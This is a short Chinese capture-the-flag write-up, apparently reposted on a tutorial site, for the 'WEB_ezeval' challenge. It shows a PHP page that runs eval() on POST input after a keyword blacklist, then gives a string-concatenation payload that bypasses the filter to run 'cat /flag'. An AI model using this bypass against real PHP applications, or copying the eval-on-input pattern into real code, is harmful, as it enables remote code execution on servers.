WEB_ezeval

2021/11/3 23:16:57

本文主要是介绍WEB_ezeval,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

打开页面,发现代码

 <?php
highlight_file(__FILE__);
$cmd=$_POST['cmd'];
$cmd=htmlspecialchars($cmd);
$black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','include','var','print','scan','decode','system','func','ini_','passthru','pcntl','open','link','log','current','local','source','require','contents');
$cmd = str_ireplace($black_list,"BMZCTF",$cmd);
eval($cmd);
?> 

htmlspecialchars() :把预定义的字符转换为 HTML 实体。

str_ireplace() :替换字符串中的一些字符(不区分大小写)。

eval()函数:把字符串作为PHP代码执行。

思路:通过post传入命令执行语句,并绕过$black_list禁用的函数

 

拼接字符串绕过

cmd=(s.y.s.t.e.m)('cat /flag');  

 

 BMZCTF{74a708a23f23400a8fb1411618650763}



这篇关于WEB_ezeval的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程